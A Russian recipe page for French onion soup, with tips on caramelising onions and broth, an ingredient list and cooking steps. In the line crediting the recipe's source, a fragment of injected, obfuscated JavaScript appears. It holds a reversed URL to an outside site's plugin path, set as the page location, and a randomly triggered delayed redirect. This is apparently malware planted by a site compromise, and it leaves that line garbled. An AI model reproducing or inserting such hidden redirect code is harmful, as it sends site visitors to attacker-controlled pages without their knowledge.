Рецепт дня: прекрасный луковый суп

Как превратить острый и горький лук в самый вкусный суп на свете? Рассказывает Кристина Подрезова.

Рецепт дня: прекрасный луковый суп. Изображение номер 1

Фото: munchinwithmunchkin.com

Выбирайте правильный лук

Он должен быть крепким, сладким, ароматным и, конечно же, свежим. Лучше всего выбирать репчатый или белый лук — он содержит много сахара, а значит, отлично карамелизируется и придаёт супу нужный вкус и цвет.

Как сделать суп ещё вкуснее и ароматнее

Луковый суп получится идеальным только в том случае, если вы правильно приготовите лук. Сначала его нужно нарезать тонкими ломтиками, а затем обжаривать на сковороде от 20 до 40 минут. В итоге лук должен быть мягким, а по цвету напоминать густую карамель. Если ваш лук недостаточно сладкий и не напоминает карамель, можете добавить немного тростникового сахара и продолжить обжарку. Также в суп можно добавить немного хорошего белого вина, портвейна или яблочного сидра — для неповторимого аромата и вкуса.

Бульон решает всё

Наваристый бульон не повредит вашему супу, однако он не должен быть жирным. При этом вы можете использовать и мясной, и овощной бульоны. Хотите более лёгкую версию супа — замените бульон водой. Но помните, что вместе с парочкой десятков калорий ваш суп потеряет аромат. Мы считаем именно говяжий бульон идеальной парой для карамелизированного лука.

Французский луковый суп

Рецепт дня: прекрасный луковый суп. Изображение номер 2

Рецепт дня: прекрасный луковый суп

СЛОЖНОСТЬ РЕЦЕПТА:

ВРЕМЯ ПРИГОТОВЛЕНИЯ:

3 ЧАСА

КОЛИЧЕСТВО ПОРЦИЙ:

8

КАЛОРИЙНОСТЬ:

не указана

0 calories

Рецпет с сайта fitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-nyashka.ru

PT1H

PT1H

Ингредиенты

репчатый лук

4 шт.

цельнозерновая мука

1 ст. л.

свежий тимьян

3 веточки

бальзамический уксус

1 ст. л.

сливочное масло

80 г

сухой яблочный сидр

400 мл

наваристый говяжий бульон

600 мл

цельнозерновой тост

8 шт.

чеснок

1 зубчик

сыр грюйер

100 г

  1. Растопите сливочное масло в кастрюле с толстым дном. Добавьте нарезанный колечками лук. Обжаривайте на среднем огне. Как только лук станет мягким и прозрачным, убавьте огонь до минимума и тушите лук около одного часа, постоянно помешивая.
  2. Добавьте муку и тимьян и перемешайте. Затем влейте уксус и треть сидра, вновь перемешайте. Добавьте оставшийся сидр и бульон и увеличьте огонь. Как только суп закипит, вновь убавьте огонь и варите суп ещё час. Посолите по вкусу.
  3. Поставьте сковородку на огонь. Подрумяньте тосты без масла с обеих сторон. Затем натрите хлеб разрезанным зубчиком чеснока. Положите на тосты по кусочку сыра и поставьте в духовку, разогретую до 180 градусов. Как только сыр расплавится, доставьте хлеб из духовки.
  4. Разлейте суп по тарелкам, украсьте тостами с сыром. Подавайте сразу же!
Оцените статью
Дежурная Качалка
Добавить комментарии

;-) :| :x :twisted: :smile: :shock: :sad: :roll: :razz: :oops: :o :mrgreen: :lol: :idea: :grin: :evil: :cry: :cool: :arrow: :???: :?: :!:

Adblock
detector